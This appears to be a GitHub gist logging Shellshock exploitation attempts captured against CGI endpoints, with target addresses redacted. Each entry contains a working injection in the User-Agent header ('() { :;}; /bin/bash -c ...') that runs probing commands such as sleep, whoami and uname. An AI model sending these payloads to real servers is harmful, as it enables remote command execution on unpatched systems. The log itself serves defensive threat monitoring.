Skip to content

Instantly share code, notes, and snippets.

@jatrost
Last active August 29, 2015 14:07
Show Gist options
  • Save jatrost/d3eb1a5cf5ef0b6a1cef to your computer and use it in GitHub Desktop.
Save jatrost/d3eb1a5cf5ef0b6a1cef to your computer and use it in GitHub Desktop.
source_ip: 128.199.223.129
url: http://XXX.XXX.XXX.XXX/cgi-bin/test.cgi
HTTP Headers:
Host: XXX.XXX.XXX.XXX
Content-Length:
User-Agent: () { :;}; /bin/bash -c "sleep 2"
Content-Type: text/plain
source_ip: 128.199.223.129
url: http://XXX.XXX.XXX.XXX/cgi-bin/test.cgi
HTTP Headers:
Host: XXX.XXX.XXX.XXX
Content-Length:
User-Agent: () { :;}; /bin/bash -c "sleep 3"
Content-Type: text/plain
source_ip: 128.199.223.129
url: http://XXX.XXX.XXX.XXX/cgi-bin/test.cgi
HTTP Headers:
Host: XXX.XXX.XXX.XXX
Content-Length:
User-Agent: () { :;}; /bin/bash -c "sleep 5"
Content-Type: text/plain
source_ip: 54.251.83.67
url: http://XXX.XXX.XXX.XXX/
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "echo testing9123123"; /bin/uname -a
Content-Type: text/plain
source_ip: 192.99.247.174
url: http://XXX.XXX.XXX.XXX/cgi-bin/report.cgi
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "whoami" #Your system may be vulnerable to ShellShock. Please visit https://shellshock.net/ for more information.
Content-Type: text/plain
source_ip: 54.251.83.67
url: http://XXX.XXX.XXX.XXX/
HTTP Headers:
Host: XXX.XXX.XXX.XXX
Content-Length:
User-Agent: () { :;}; /bin/bash -c "echo testing9123123"; /bin/uname -a
Content-Type: text/plain
source_ip: 193.0.200.134
url: http://XXX.XXX.XXX.XXX/cgi-sys/entropysearch.cgi
HTTP Headers:
Content-Length: 0
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;};echo vOLniO4dcLqW2I3MnIVpSfk8bmzyxXaIF$(echo vOLniO4dcLqW2I3MnIVpSfk8bmzyxXaIF)vOLniO4dcLqW2I3MnIVpSfk8bmzyxXaIF
Content-Type: application/x-www-form-urlencoded
source_ip: 193.0.200.134
url: http://XXX.XXX.XXX.XXX/cgi-sys/defaultwebpage.cgi
HTTP Headers:
Content-Length: 0
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;};echo I1QPt2WCxxWSAlVKXMbjJde38EwEaZyvx2zBLGLSKT$(echo I1QPt2WCxxWSAlVKXMbjJde38EwEaZyvx2zBLGLSKT)I1QPt2WCxxWSAlVKXMbjJde38EwEaZyvx2zBLGLSKT
Content-Type: application/x-www-form-urlencoded
source_ip: 193.0.200.134
url: http://XXX.XXX.XXX.XXX/cgi-mod/index.cgi
HTTP Headers:
Content-Length: 0
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;};echo I1QPt2WCxxWSAlVKXMbjJde38EwEaZyvx2zBLGLSKT$(echo I1QPt2WCxxWSAlVKXMbjJde38EwEaZyvx2zBLGLSKT)I1QPt2WCxxWSAlVKXMbjJde38EwEaZyvx2zBLGLSKT
Content-Type: application/x-www-form-urlencoded
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment